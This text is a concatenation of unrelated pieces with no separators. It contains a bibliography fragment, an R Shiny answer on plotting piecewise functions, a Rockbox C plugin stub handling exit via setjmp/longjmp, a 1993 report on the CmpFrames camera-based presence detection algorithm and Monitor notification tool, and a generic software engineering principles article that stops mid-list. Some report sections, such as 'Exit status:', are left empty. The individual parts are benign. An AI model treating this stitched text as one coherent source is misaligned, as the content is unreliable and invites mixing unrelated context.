[6] Heiko Oberdiek and Luca Merciadri. Footnotes in boxes (comp.text.tex discussion), 2010.
[7] Philipp Stephani and Luca Merciadri. Enumerate package: how to put two itemizations on the same line? (comp.text.tex discussion), 2010.
[8] Andrew T. Young. Controlling LaTeX floats, 2010. http://mintaka.sdsu.edu/GF/bibliog/latex/floats.html.
Bruna Wundervald - 7 months ago

R question: plotting equations with restricted domains in shiny

Hi there. I'm building a Shiny app that plots some functions. The user can modify the parameters. The problem appears when I have a restricted function, especially when the restriction is related to x. This is one example:

Sliders:

sliderInput("th19", HTML("$$ \\theta_1 $$"), min = 1, max = 10, value = 2)
sliderInput("thB9", HTML("$$ \\theta_b $$"), min = 1, max = 10, value = 2)
sliderInput("vthB9", HTML("$$ \\vartheta_b $$"), min = 1, max = 20, value = 2)

Plot:

mForm9.1 <- as.formula("Y ~ vthB9 + th19*(x - thB9)")
mExpr9.1 <- mForm9.1[[3]]

output$Curve9 <- renderPlot({
  th19 <- input$th19
  vthB9 <- input$vthB9
  thB9 <- input$thB9
  eval(call("curve", mExpr9.1, col = 2, ylab = "",
            main = expression(vartheta[b] + theta[1]*(x - theta[b]))))
}, height = 400, width = 600)

mainPanel(
  tabsetPanel(type = "tabs",
              tabPanel("Gráfico", plotOutput("Curve9"))
  ))

What should happen here is that when x is bigger than vthB9, the equation reduces to just vthB9, and this is only one of the cases I have. Does anybody know what to do?

Hope I have been clear. I'm using flexdashboard, which is why the Shiny code might look a little different.

Answer

There are possibly multiple ways to plot a piecewise function in R. I am going to suggest probably the easiest one in this case. We first define the piecewise function, say fun,

fun <- function(x) {
  ifelse(test = x <= vthB9,
         yes = vthB9 + th19 * (x - thB9),
         no = vthB9)
}

which we then pass to curve:

curve(expr = fun, from = 0, to = 10, col = 2, ylab = "",
      main = expression(vartheta[b] + theta[1] * (x - theta[b])))

curve passes a whole vector of x values to the function fun. The usual if-else statements would not work here because they test only one value at a time, unless we wrote a for-loop or vectorized the function with Vectorize. Instead, we pick ifelse, which is already vectorized.
Since you have used a shiny tag, I've prepared a Shiny app instead of a flexdashboard :)

Full shiny example

ui <- fluidPage(
  sidebarLayout(
    sidebarPanel(
      sliderInput("th19", HTML("&theta; <sub>1</sub>"), min = 1, max = 10, value = 2),
      sliderInput("thB9", HTML("&theta; <sub>b</sub>"), min = 1, max = 10, value = 2),
      sliderInput("vthB9", HTML("&thetasym; <sub>b</sub>"), min = 1, max = 20, value = 2)
    ),
    mainPanel(
      tabsetPanel(type = "tabs",
                  tabPanel("Gráfico", plotOutput("Curve9"))))
  )
)

server <- function(input, output) {
  output$Curve9 <- renderPlot({
    th19 <- input$th19
    vthB9 <- input$vthB9
    thB9 <- input$thB9

    # Define a piecewise function
    fun <- function(x) {
      ifelse(test = x <= vthB9,
             yes = vthB9 + th19 * (x - thB9),
             no = vthB9)
    }

    # x-axis goes now from 0 to 10
    curve(expr = fun, from = 0, to = 10, col = 2, ylab = "",
          main = expression(vartheta[b] + theta[1] * (x - theta[b])))
  }, height = 400, width = 600)
}

shinyApp(ui, server)
/***************************************************************************
 *             __________               __   ___.
 *   Open      \______   \ ____   ____ |  | _\_ |__   _______  ___
 *   Source     |       _//  _ \_/ ___\|  |/ /| __ \ /  _ \  \/  /
 *   Jukebox    |    |   (  <_> )  \___|    < | \_\ (  <_> > <  <
 *   Firmware   |____|_  /\____/ \___  >__|_ \|___  /\____/__/\_ \
 *                     \/            \/     \/    \/            \/
 * $Id$
 *
 * Copyright (C) 2009 by Maurus Cuelenaere
 *
 * This program is free software; you can redistribute it and/or
 * modify it under the terms of the GNU General Public License
 * as published by the Free Software Foundation; either version 2
 * of the License, or (at your option) any later version.
 *
 * This software is distributed on an "AS IS" basis, WITHOUT WARRANTY OF ANY
 * KIND, either express or implied.
 *
 ****************************************************************************/

#include "plugin.h"
/* #include "lib/pluginlib_exit.h" */
#if (CONFIG_PLATFORM & PLATFORM_NATIVE)
#include "../codecs/lib/setjmp.h"
#else
#include <setjmp.h>
#endif

PLUGIN_HEADER

extern enum plugin_status plugin_start(const void*);

static void (*atexit_func)(void);
static jmp_buf __exit_env;

int atexit(void (*fn)(void))
{
    if (atexit_func)
        return -1;

    atexit_func = fn;
    return 0;
}

void exit(int status)
{
    longjmp(__exit_env, status != 0 ? 2 : 1);
}

enum plugin_status plugin__start(const void *param)
{
    enum plugin_status ret;

    ret = setjmp(__exit_env);
    if (ret == 0)
        ret = plugin_start(param);
    else
    {
        if (ret == 1)
            ret = PLUGIN_OK;
        else if (ret == 2)
            ret = PLUGIN_ERROR;
    }

    if (atexit_func)
        atexit_func();

    return ret;
}
ACTIVITY SENSING THROUGH PORTHOLES IMAGES: A BRIDGE BETWEEN PASSIVE AWARENESS AND ACTIVE AWARENESS

Luca Giachino - August 1993
email: [email protected], [email protected]
CEFRIEL - Via Emanueli, 15 - 20126 Milano - Italy
Work performed while visiting the Telepresence Project at the University of Toronto

Introduction

Portholes is a system that provides support for general awareness in a distributed work group. It gathers still images from different environments (workspaces and public areas) and distributes them to subscribers of the service, without performing any semantic interpretation. It is up to the subscribers to look at the images and give them a meaningful semantics. Given this architecture, it is interesting to investigate the automatic extraction of information from the environment through the images collected by Portholes. This information can be used for issuing notifications of events concerning persons' presence and availability. In this way the Portholes architecture becomes a means for performing activity sensing on the environment, thereby providing a bridge between passive awareness and active awareness.

In order to provide active awareness, the kind of activity we generally want to monitor is human activity, so that we can issue notifications concerning relevant people's actions, like leaving their workspace, logging out from the iiif server, or changing the state of their office door. Among these possible actions, a person's presence in front of his or her camera can be detected by properly comparing sequential images grabbed from that camera. Other actions can be detected more easily by querying the iiif server. In our media space, one of the reasons for using the Portholes images for sensing human activity, instead of other environment sensors, is that the cameras, the wiring and the iiif server are already there.
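The frame-comparison idea mentioned above can be sketched very simply. The Python below is an illustration only, not the actual CmpFrames code (which is not given in this paper); the pixel and fraction thresholds are invented for the example. It guesses 'activity' when enough pixels of two same-sized grayscale frames differ by more than a noise tolerance:

```python
def activity_guess(frame_a, frame_b, pixel_threshold=16, changed_fraction=0.02):
    """Guess whether activity occurred between two same-sized grayscale
    frames, given as flat lists of 0-255 intensities.

    A pixel counts as 'changed' if it differs by more than pixel_threshold
    (tolerating camera noise); we guess activity if more than
    changed_fraction of all pixels changed. Both thresholds are
    illustrative, not values from the real CmpFrames module."""
    assert frame_a and len(frame_a) == len(frame_b)
    changed = sum(1 for a, b in zip(frame_a, frame_b)
                  if abs(a - b) > pixel_threshold)
    return changed / len(frame_a) > changed_fraction

# Identical frames: no activity guessed.
still = [120] * 1000
print(activity_guess(still, still))  # → False

# 5% of the pixels jump in brightness: activity guessed.
moved = still[:]
for i in range(50):
    moved[i] = 200
print(activity_guess(still, moved))  # → True
```

Note that such a detector embodies the paper's caveats: it assumes a stable background, and a screen saver or a sudden lighting change would trip it just as a person would, which is why the result is only a guess.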
Another reason for using images provided by cameras is that we can expect, in the coming years, an increasing production of personal computers equipped with cameras, together with speakers and microphones.

In order to detect the presence of human activity using the Portholes images, I wrote a software module, called CmpFrames, that, given two consecutive frames of the same scene, guesses whether or not there is human activity. CmpFrames has been designed to be very quick in providing a guess, but it provides only a 'guess'. For the sake of execution speed, it assumes that the scene has some specific properties, such as a stable background. If these properties are not met, the guess can be wrong, and the sensed activity can be of another nature (a screen saver, for instance).

CmpFrames is the fundamental building block upon which I created a personal notification tool, called Monitor, that provides notifications of people's presence and availability. It was mainly written for testing the CmpFrames module, but it turned out to be an interesting personal notification tool in its own right. At the time of this writing, the CmpFrames module has not yet been integrated into Portholes. The images are gathered by asking the iiif server to connect people's cameras to a frame grabber. Users' privacy is guaranteed by the access control performed by the iiif server.

The following two sections describe the concept of active awareness and the CmpFrames algorithm. If you are mainly interested in testing and using the Monitor program, you can skip these two sections and read the next one, The Monitor Program section, which explains the purposes of the program and how to use it.

A Bridge from Passive Awareness to Active Awareness

Before describing in detail the CmpFrames software module and the Monitor program, it is useful to briefly describe what I mean by a bridge between passive awareness and active awareness.
The terminological distinction between passive and active awareness is somewhat new, and needs more investigation than I have been able to give it so far. Since the terminology of the computer-supported awareness field is not yet settled, we are in a position to refine and coin terminology, with all the possible debates that can follow.

In terms of communication involving human beings and computers, Portholes can be considered a system that allows HH (human-to-human) communication in the background. The following figure shows a conceptual frame (borrowed from Professor Bill Buxton) for describing the possible kinds of communication we find in systems that involve both human beings and computers (possibly connected by networks). In this frame the Portholes system falls in the HH background communication category, since it allows human-to-human communication performed without explicit users' actions.

Figure 1: The Communication Arena

In addition to investigating the individual areas, it is also interesting to explore the possible migrations from one area to another. The CmpFrames software module provides the path for one possible migration, which is shown in the next figure. There we see that, by means of the CmpFrames module, Portholes detects on behalf of a client that a user is now available (HC communication in the background), alerts the client through the GUI asking if he or she wants to call a video meeting (HC communication in the foreground), and finally a video meeting is called (HH communication in the foreground).

Figure 2: A Possible Path from Background to Foreground HH Communication

According to this scheme, whilst the Portholes system provides passive awareness, that is, awareness gained in the background, the CmpFrames software module and the Monitor program constitute the means for achieving active awareness, that is, awareness gained in the foreground. But the question is: once we enhance Portholes to provide active awareness, how will we consider it?
A more general awareness support tool, or a mixture of somewhat unrelated facilities? Moreover, we might find that people are reluctant to have their images periodically distributed among other users (Portholes), but less so when the images are used for active awareness purposes that do not imply the distribution and public accessibility of the images (CmpFrames and Monitor).

The CmpFrames Software Module

In order to describe the CmpFrames software module and the design issues that drove its realization, we have to describe the scene we consider, which parts of the scene are of interest for the detection of human activity, and how we can gather images of the scene. Moreover, we have to outline the constraints we have to take into account, mainly imposed by the hardware, by the grabbing rate, and finally by the requirement to have a quick guess at the price of some uncertainty.

The Scene

The scene we consider for detecting human activity is rather complex. We want to monitor people's workspaces, and so we restrict the spectrum of the possible scenarios to those you can find in a typical office environment. At the Telepresence Project laboratories we have both closed offices (Toronto) and open offices (Ottawa). Offices can have real or artificial windows with moving scenery behind them (a street, a cloudy and windy sky, a soccer field). If they have real windows, the light inside the office can strongly depend on the weather conditions. In the offices there can be computer monitors with screen savers that modify the displays even when nobody is there. Moreover, in open offices it is likely that people besides the person we want to monitor move in the environment.

The View of the Scene

Besides the peculiarities of the scene we consider, the position and orientation of the camera we use and the quality of the hardware involved also play a crucial role. In an office, the camera from which the images are frame-grabbed can be in different positions.
In our media space, for example, some people have only one camera, located very close to their work desk and oriented towards the person. Others have additional cameras for shooting the whole office space, or for shooting from particular perspectives (like a camera located on the office's door). All of these cameras provide different views of the environment, and this adds to the complexity of the scene. For our purposes, the farther away the camera is, the better, since we can monitor a larger space. But the drawback is that the chance of having moving objects in the scene, in addition to the person, increases.

The cameras we use provide color video sequences, but for our purposes we consider only gray-level images (256 gray levels). This choice is partially due to the fact that Portholes handles gray-level images in order to reduce the network overhead. These images are pretty small (240x160), but convey enough information for human activity detection. The rate at which the images are provided can range from one every 30 seconds to one every 5 minutes. Portholes generally provides images at the rate of one every 5 minutes. The rate has important implications for the design of the activity detection algorithm, as described later.

The Relevant Information

Our purpose is to detect human activity in a very quick way. We don't need to recognize the person (a very time-consuming process), since we can assume that in an office most of the activity is performed by the person who actually works in that office (as opposed to colleagues and cleaning staff). We do not even need to extract geometrical descriptions of the image. Any recognition process is generally a complex task, and this is why we decided to avoid any morphological interpretation of the images' contents.
Moreover, a human shape recognition system, for example, might require even more constraints on the scene, like having the person perfectly oriented towards the camera.

The CmpFrames Algorithm

Given the described scene and constraints, I opted for an algorithm that, given two consecutive images, counts the percentage of pixels that can be considered different (according to an error threshold), and then compares this percentage with a quiet threshold. If it is lower than the quiet threshold, then the algorithm assumes that there is no activity; otherwise, that there is activity. As long as the images are very similar one to the next, we assume that there is no relevant activity. The activity condition is the complementary one, no matter how different the images are. In other words, we actually detect quietness, as opposed to human activity. This approach is quite useful, since it allows us to detect activity also when the person rotates the camera: the images from one state of the camera to the next will be even more different, and this is enough to assume that there is activity. Even if the camera is now oriented towards the wall, for at least one more image we can still detect activity, and this guess is correct, since the person had to be there to rotate the camera.

The drawback is that we need two frames in order to make a decision, and this fact leads to a delay in recognizing when the person leaves his or her workspace (this point is explained further in the description of the Monitor program). The fact that we need two consecutive images also means that their histograms must not be altered (for instance, through a normalization process); otherwise the process would easily detect changes that are actually produced by the image processing calculations on the histograms.
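As a concrete illustration, the core of such a comparison might look like the following C sketch. This is not the actual CmpFrames() code: the function name, the flat-array image layout, and the parameter choices are assumptions, and the error threshold is taken here as an already-computed absolute gray-level difference (the report derives it from a percentage, as described later).

```c
#include <stdlib.h>

/* Count the fraction of pixels whose gray levels differ by more than
 * err_thresh, then compare that fraction against the quiet threshold.
 * Returns 1 if activity is assumed, 0 otherwise.  prev and cur are
 * width*height arrays of 8-bit gray levels. */
int guess_activity(const unsigned char *prev, const unsigned char *cur,
                   int width, int height,
                   int err_thresh, double quiet_thresh_pct)
{
    long changed = 0;
    long total = (long)width * height;
    for (long i = 0; i < total; i++) {
        int diff = (int)prev[i] - (int)cur[i];
        if (diff < 0)
            diff = -diff;
        if (diff > err_thresh)          /* pixels considered different */
            changed++;
    }
    double pct = 100.0 * (double)changed / (double)total;
    return pct > quiet_thresh_pct;      /* at or below quiet threshold => no activity */
}
```

With the empirical values suggested later in this report, the quiet threshold would be 8% and the error threshold would be derived from a 3% figure.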
For this approach to be effective, we assume that when a person is not in the view of the camera, consecutive images are very similar one to the next, that is, the background does not change. This is obviously a strong limitation, since in the view of the camera, as already mentioned, there are likely to be moving objects other than the person we want to monitor. Moreover, even with a very stable background, the hardware limitations are likely to produce consecutive images that are not equal pixel by pixel.

The Hardware Limitations

The hardware between the scene and the grabbed image is composed of a camera, a wire with possible intermediate analog devices, and a frame-grabber. All these components introduce noise into the analog video signal. In our media space, for instance, many cameras are located pretty far from the frame-grabber. In between there are meters of wire and sometimes devices for conveying different video signals on the same wire.

The hardware limitations produce two different effects on the images. The first one is the presence of spikes, that is, isolated pixels that have a very different gray level from their neighborhood. The second one is that, even with the same scene, pixels in the same positions can have different gray levels in two consecutive images. The algorithm we propose filters the images using a convolution mask that smoothes out the discrepancies. This process reduces the incidence of the spikes, and cleans the image, producing more uniformity between images of the same scene. After this smoothing process is completed, the algorithm begins to compare the images. During the comparison of pixels the algorithm uses a proximity level, or error threshold, for deciding whether two pixels are to be considered equal or not. This error threshold helps to reduce the incidence of the hardware limitations.
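A smoothing pass of the kind described can be sketched as a uniform 3x3 averaging mask. The actual convolution mask used in the media space is not specified here, so the uniform kernel, the border handling, and the function name below are assumptions for illustration only.

```c
#include <string.h>

/* Smooth an image with a uniform 3x3 averaging mask, a simple stand-in
 * for the convolution filter described above.  Border pixels are copied
 * unchanged.  src and dst are width*height arrays of 8-bit gray levels. */
void smooth3x3(const unsigned char *src, unsigned char *dst,
               int width, int height)
{
    memcpy(dst, src, (size_t)width * (size_t)height);  /* keep the 1-pixel border */
    for (int y = 1; y < height - 1; y++) {
        for (int x = 1; x < width - 1; x++) {
            int sum = 0;
            for (int dy = -1; dy <= 1; dy++)
                for (int dx = -1; dx <= 1; dx++)
                    sum += src[(y + dy) * width + (x + dx)];
            dst[y * width + x] = (unsigned char)(sum / 9);
        }
    }
}
```

An isolated spike is strongly attenuated by this pass: a lone pixel at gray level 90 in a field of 9s drops to 18, so it is far less likely to exceed the error threshold in the subsequent comparison.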
The error threshold is a parameter of the algorithm that can be tuned to accommodate the hardware limitations. If the hardware is of good quality, then the error threshold can be lowered. The algorithm requires an error threshold expressed as a percentage. It then calculates the absolute error threshold by: 1) extracting the maximum gray level from each of the two images, 2) choosing the lower one, 3) applying the percentage to this gray level. In this way we use the worst conditions for calculating the absolute error threshold, and we recalculate it for every pair of images.

The Scene Constraints

The quiet threshold is used to decide whether the percentage of changed pixels is high enough to indicate the presence of activity. By choosing a proper level, we can discriminate between small and consistent changes in the scene. In this regard, the grabbing rate becomes very important. If the camera video signal is sampled every 5 minutes, then it is pretty likely that a person who is in front of the camera in two sequential images will have moved considerably between them (short of sleeping), even if deeply concentrated on something. In this case, the quiet threshold can be increased enough to let the algorithm consider small changes as absence of activity (a screen saver, or a truck moving on the street). On the other hand, if the rate is one frame every 30 seconds, then it can happen that in such a small amount of time the person does not move a lot, perhaps because he or she is typing on the keyboard. In this case the threshold must be lowered so that even very small movements of the person are enough to detect the presence of activity. But the drawback is that small changes in the background could also trigger such a condition, even if the person is not there.

The distance of the action from the camera is also important.
Since we use a percentage of changed pixels for detecting action, the smaller the action appears in the images (because the person is far away), the lower the percentage of changed pixels. In this case the quiet threshold should be lowered accordingly. Finally, the brightness of the scene affects the amount of noise introduced by the camera. As the scene becomes darker and darker, the noise introduced by the camera increases, and a higher error threshold might be required.

As appears from this description, the thresholds are very important for having the algorithm work properly under different conditions. Even if the best solution would be to have adaptive thresholds, good performance can already be obtained by using personal profiles in which the best empirical thresholds for every person we want to monitor are stored. We describe this idea further in the Future Work section.

How to Fine Tune the Thresholds

Our experience with the hardware and the kinds of scenes we have shows that an error threshold of 3% is enough for masking the hardware limitations, and that consequently a good quiet threshold is 8%. Note that the effectiveness of the quiet threshold depends on the error threshold: if the latter is changed, then the quiet threshold must be retuned. A good procedure for setting the thresholds is the following. The first threshold to be set is the error one. In order to accommodate the hardware limitations, you grab several images from a very stable scene, and tune the error level so that the amount of changed pixels detected by the CmpFrames algorithm is lower than 2%. Then you grab images with a person in the scene who tries to move very little, and set the quiet threshold just under the average percentage of changed pixels that the algorithm detects. In the section that describes the Monitor program this procedure is explained in more detail.

The Complexity of the Algorithm

The proposed algorithm has linear complexity.
It scans the two images twice. During the first scan it smooths the images with a proper convolution mask and meanwhile computes the maximum gray level of each of the two images. Then, during the second scan, it computes the percentage of pixels that are different and compares it with the quiet threshold. The algorithm can be improved by storing the maximum gray level of the second image so that we don't need to recompute it at the next comparison. In this way one of the scans can be saved.

Technical Details

The CmpFrames algorithm is actually implemented by an ANSI C function called CmpFrames() that is defined in the source file chkact.c of the distribution package. This source file depends only on the include file chkact.h, and can be linked with any program that needs to detect the presence of activity by comparing environment images. The CmpFrames() function assumes that the images are stored in memory as two dynamic bi-dimensional arrays of unsigned chars, one pixel per char. This kind of array is defined as a pointer to an array of pointers to unsigned chars (that is, typedef unsigned char **frame), and can be easily handled using the functions defined in the source file array.c. However, the chkact.c source is completely independent of the array.c source. In the current version of the CmpFrames() function the smoothing step is not performed; it is assumed to be performed by the calling code. Finally, if requested, the function can store in a third array an image in which the pixels that have been considered changed are set to black whilst all the others are set to white. This image can be useful for testing and fine-tuning purposes.

The Fcmp Tool

In order to provide user-level access to the CmpFrames() function, a program called Fcmp has been written. It uses the CmpFrames() function for comparing images stored on disk in the PGM format (see the public domain PbmPlus package).
It mainly parses the command line for arguments, reads and stores the images in memory, and calls the CmpFrames() function. If requested (by option -d), the program stores in a file a PBM image in which the black pixels denote the pixels that have been considered different by the CmpFrames() function, whilst the white pixels denote areas in which no changes have been detected. Note that the program does not run the convolution mask on the images. This filtering operation can be easily accomplished at the user level by running the pnmsmooth program, contained in the PbmPlus package, on the images before calling the Fcmp program. The syntax is as follows.

Usage: fcmp frame1 frame2 [-e error_level][-q quiet_level][-d diffFile][-s][-v]

Exit status:

This program can be compiled with an ANSI C compiler, like the gcc compiler.

The Monitor Program

The Monitor program is a personal notification tool that exploits the CmpFrames software module in order to provide notifications of events concerning people's availability. The tool is intended to be easy to use, and does not require specific skills. It provides an alert (a sound and a text event description) as soon as the monitored person arrives at or leaves his or her workplace. If X Windows is available, you can also ask Monitor to output the grabbed frames in a window, one after the other, or to display the two frames of the last comparison together with the changed-pixels frame (see the Fcmp program). These graphic outputs can be useful for testing the program: with a quick glance you can easily tell whether the program has made a good guess. Moreover, the changed-pixels frame can be very effective for checking whether the noise generated by the hardware is properly reduced.

Monitor can also work silently, providing only return codes that can be used by other shell scripts and/or commands for further processing. This working modality can be used for building other personal tools on top of the Monitor program.
The package includes two examples of this kind of personal tool: Areyouthere detects whether the person is there or not, whilst Whenarrives returns only when the person has returned or when activity is detected. These programs are very simple shell scripts that exploit the silent facility provided by Monitor. The main difference between using these programs and using the Monitor program directly is that Areyouthere and Whenarrives exit once they can provide the notifications, whilst the Monitor program can be run for continuous monitoring purposes.

Originally, one of the main purposes of the Monitor program was to allow easy testing of the Fcmp software module before integrating it in the Portholes system, but it turned out that it can be used as a useful standalone tool, completely independent of the Portholes system. Monitor relies on the iiif server for connecting users' cameras to a centralized frame-grabber. By means of this interaction with the iiif server, the program is able to detect specific conditions related to the state of the person's Telepresence Stack. This possibility enhances the set of notifications that the program can issue.

Event and Status Notifications

A notification is a message that is delivered to the user who has executed the program. Generally, a notification is issued when a related condition is recognized. Notifications are always time-stamped, but the time-stamp must not be considered the exact moment at which the condition arose, but rather the moment at which the program was able to detect that condition. This is due to the fact that Monitor polls for conditions. Monitor can provide two main kinds of notifications. Status notifications can be considered the recognition of a state (and not of a change of state). These notifications are issued when there is no memory of a previous state.
For instance, when the program is executed for monitoring John, and John is in his office, the program reports a status of activity detected. Clearly, this is not an event. As soon as a change of state in the scene is detected, an event notification is issued: John has arrived, or John has closed his door, or John has logged out. The following is a comprehensive list of all the categories of notifications that Monitor can issue.

EVENT) A change of state has been detected (the person has arrived or has left, has closed or opened his or her door, has logged in to or out from the iiif server)

STATUS) A status is reported only when the available information is not enough to detect any change of state (for instance, at the beginning of an execution the first two frames are enough to say whether or not there is activity, but not to detect a change of state, since we do not have background information yet)

DEBUG) Debug warnings, issued only if option -d is indicated on the command line

ERROR) An error condition occurred. The program aborts

How it Works

Monitor is a shell script that uses the Fcmp program for comparing the frames. Basically, Monitor periodically asks the iiif server to connect the person's or node's camera to the frame-grabber, and uses the grab program for grabbing images (more later about the grab program). Once a frame has been grabbed, Monitor cleans it using the PbmPlus tool pnmconvol. Then, if a previous frame is available, Monitor calls the Fcmp program described in the previous section. Fcmp performs the comparison between the two frames and detects whether there is activity. Monitor uses this information and compares it with the previous result, if any, in order to guess what happened in the scene.
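The way two successive comparison results can be mapped onto status and event notifications might be sketched as a small state machine. Monitor itself is a shell script, so the C below is only an illustration, and the enum and function names are hypothetical.

```c
/* Possible notification outcomes, mirroring the STATUS/EVENT categories
 * described above.  This is a sketch of the polling logic, not the
 * actual shell-script implementation. */
typedef enum {
    NOTE_STATUS_ACTIVE,   /* first result: activity, no history yet  */
    NOTE_STATUS_QUIET,    /* first result: no activity, no history   */
    NOTE_EVENT_ARRIVED,   /* quiet -> active: the person has arrived */
    NOTE_EVENT_LEFT,      /* active -> quiet: the person has left    */
    NOTE_NO_CHANGE        /* same state as before, nothing to report */
} notification;

/* prev_activity: -1 if no previous comparison exists, else 0 or 1.
 * cur_activity: result of the latest frame comparison (0 or 1). */
notification classify(int prev_activity, int cur_activity)
{
    if (prev_activity < 0)  /* no memory of a previous state: STATUS */
        return cur_activity ? NOTE_STATUS_ACTIVE : NOTE_STATUS_QUIET;
    if (prev_activity == cur_activity)
        return NOTE_NO_CHANGE;
    return cur_activity ? NOTE_EVENT_ARRIVED : NOTE_EVENT_LEFT;
}
```

The first branch corresponds to the status notifications issued at the beginning of an execution, when there is no previous state to compare against.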
Because of the way the absence of activity is detected by the Fcmp program (that is, we have no activity when two sequential frames are very similar one to the next), it turns out that the Monitor program lags one frame behind in detecting when the person has left (think about it). Anyway, this is not a big problem, since the most used feature should be the notification of people's arrival.

Installation

The package contains the following files:

README        A readme file
doc           The directory containing documentation files, like:
  monitor.mcw   A MacWord version of this report
  monitor.rtf   An RTF version of this report
  monitor.txt   An ASCII version of this report
  monitor.ps    A PostScript version of this document
fcmp          Compares two frames and detects activity (to be manually compiled on a different architecture)
grab          Grabs a frame from the local frame-grabber (to be manually compiled on a different architecture)
monitor       The Monitor tool
areyouthere   The Areyouthere tool
whenarrives   The Whenarrives tool
pnmconvol     The PbmPlus program for applying convolution filtering to frames
pnmcat        The PbmPlus program for merging different frames into one
pnmscale      The PbmPlus program for scaling frames
fcmp_src      The directory containing the sources for the fcmp program
grab_src      The directory containing the sources for the grab program

In order to install the tool, you need a SunOS 4.1.3-compatible workstation, at the binary level. Once you have untarred the package, you might want to edit the header of the shell script 'monitor' and change the default configuration. If you already have an iiif client program, all you have to do is compile the fcmp program, if your workstation is different from the one mentioned. The sources and the Makefile of the fcmp program are stored in the fcmp_src directory. If you do not have an iiif client program then you have to look for it.
As regards the grab program for controlling the frame-grabber, the binary version (grab) is provided together with the source code (grab.c) and a Makefile. To summarize:
Basic Principles of Software Engineering

Software engineering is a vital discipline centered around designing, developing, testing, and maintaining software systems. With constant advancements, it is a complex and dynamic field. Successful software engineering projects rely on adhering to fundamental principles that ensure the reliability, efficiency, and maintainability of software.

What is Software Engineering?

Software engineering is the structured, systematic process of designing, developing, testing, and maintaining software systems. It applies engineering principles and methods to software development, emphasizing the creation of software systems that are reliable, scalable, and of high quality. Software engineering encompasses various activities, such as analyzing requirements, designing software, writing code, conducting tests, and performing maintenance.

Software engineering is a complex and difficult field, with many different aspects affecting whether a software project succeeds or fails. These factors include the complexity of the software system, the skill and experience of the development team, the availability of resources, and the specific requirements of the organization or industry in question.

Why are Software Engineering Principles Important?

Developing robust, maintainable software solutions requires the application of essential software engineering principles. Adhering to these principles helps ensure that the software is developed accurately, efficiently, and cost-effectively.
Listed below are several key reasons why software engineering principles matter:

• Reliability and Correctness – Software engineering principles emphasize techniques that reduce the number of defects and bugs in the software. Principles like modularization, top-down design, and stepwise refinement break complex systems into manageable parts that are easier to verify for correctness. Furthermore, strategies like unit testing, code reviews, and walkthroughs detect errors early in the development process. This results in more reliable software that behaves as intended.

• Manageability of Complexity – Large software systems can be extremely complex, with thousands of interacting components. Software engineering principles promote ways to organize this complexity, for example through abstraction, encapsulation, and modularity. This makes the system easier to comprehend, navigate, and change over time. Without such principles in place, managing complex software would be practically impossible.

• Maintainability and Extensibility – Software engineering principles facilitate the maintenance and evolution of software systems. Principles like information hiding, separation of concerns, and layering partition the software into smaller logical pieces that can be modified independently. Conventions like naming standards and documentation procedures also aid maintainability. This makes the software adaptable to ongoing changes in requirements and technology.

• Productivity and Cost – Well-engineered software that follows basic principles tends to be less expensive to develop, test, and maintain in the long run. Good design techniques minimize rework and duplication of effort. Issues are caught and fixed earlier in the development lifecycle, avoiding costly defects in later stages. Overall, productivity is increased and development costs are reduced through the proper application of software engineering principles.
Principles of Software Engineering

The following are the guidelines and strategies we need to follow to remain rational and make technical decisions that are appropriate given the needs, budget, timeframe, and expectations. Following these guidelines will help your project progress smoothly.

• KISS (Keep It Simple, Stupid)
The KISS principle promotes software simplicity by avoiding pointless complexity and giving priority to crucial features and functionality. By following this approach, developers can reduce the likelihood of errors and defects while making maintenance and upgrades easier.

• DRY (Don’t Repeat Yourself)
The DRY principle says that unnecessary code repetition should be avoided. It highlights the value of code reuse and encourages developers to use pre-existing code rather than duplicating it across different parts of the software system. Following this rule reduces the possibility of mistakes and defects while also making maintenance and updates easier.

• YAGNI (You Aren’t Gonna Need It)
The YAGNI principle highlights the importance of implementing only the essential features during software development, as opposed to trying to foresee and include every potential feature that might be needed in the future. By abiding by this guideline, developers avoid needless complexity and minimize the chances of mistakes and flaws.

• BDUF (Big Design Upfront)
The BDUF principle states that software systems should be designed as completely as possible before any coding begins. While this approach can be useful in some cases, it can also lead to unnecessary complexity and a lack of flexibility. Instead, many developers prefer an iterative approach, where the design evolves over time as the software is developed and tested.
• SOLID
SOLID is an acronym for the five principles of object-oriented design: the Single Responsibility Principle, Open/Closed Principle, Liskov Substitution Principle, Interface Segregation Principle, and Dependency Inversion Principle. These principles help developers create software systems that are modular, flexible, and maintainable.

• Occam’s Razor
Occam’s Razor states that, all things being equal, the simplest solution is usually the best. This principle encourages developers to avoid unnecessary complexity and to focus on the most straightforward and effective solution to a given problem.

• Law of Demeter (LoD)
The Law of Demeter, also known as the principle of least knowledge, states that a software component should only interact with a limited number of other components. This helps reduce the complexity of the software system and makes it easier to maintain and update.

• Avoid Premature Optimization
Premature optimization is the practice of optimizing software before it is necessary to do so. This can lead to unnecessary complexity and a lack of flexibility. Instead, developers should focus on creating software that meets the needs of users and stakeholders, and optimize it only when necessary.

• Measure Twice and Cut Once
This notion urges engineers to take their time to carefully plan and design software systems before starting the coding process. By doing this, programmers can steer clear of expensive errors and guarantee that the software system satisfies the requirements of users and stakeholders.

• Principle of Least Astonishment
Software systems should behave in a way that is consistent with what users and stakeholders expect. This lowers the possibility of errors and malfunctions while also increasing customer satisfaction.
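To make one of these principles concrete, here is a minimal C sketch of DRY. The function names are purely illustrative: the point is that a validation rule lives in a single helper, so every caller stays consistent when the rule changes, instead of each caller repeating the same check inline.

```c
#include <ctype.h>
#include <stddef.h>

/* Before applying DRY, each caller would repeat the same "non-empty,
 * digits only" check inline.  After: the rule lives in one place, so
 * changing it (say, to allow a leading '+') touches a single function. */
static int is_numeric_id(const char *s)
{
    if (s == NULL || *s == '\0')
        return 0;
    for (; *s; s++)
        if (!isdigit((unsigned char)*s))
            return 0;
    return 1;
}

/* Two hypothetical call sites sharing the single rule. */
int validate_order_id(const char *id)    { return is_numeric_id(id); }
int validate_customer_id(const char *id) { return is_numeric_id(id); }
```

If the rule had been copy-pasted into both validators, a later fix applied to only one of them would leave the two code paths silently disagreeing — exactly the class of defect DRY is meant to prevent.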
Best Practices for Software Engineering

Software engineering follows a set of recommended practices that help ensure the success of development projects: gathering and analyzing requirements, applying agile development methodologies, using version control, testing thoroughly, documenting the process, reviewing code, enabling continuous integration and deployment, prioritizing security, tuning performance, and fostering a culture of ongoing learning and improvement. By embracing these best practices, developers can build software systems that are dependable, effective, maintainable, and in line with user and stakeholder expectations. The most important of these practices are the following:

• Requirements Gathering and Analysis – Before beginning a software development project, it is essential to acquire and understand the system's requirements. This requires engaging in active dialogue with stakeholders, understanding their needs and expectations thoroughly, and then translating those needs into specific, well-defined software requirements.

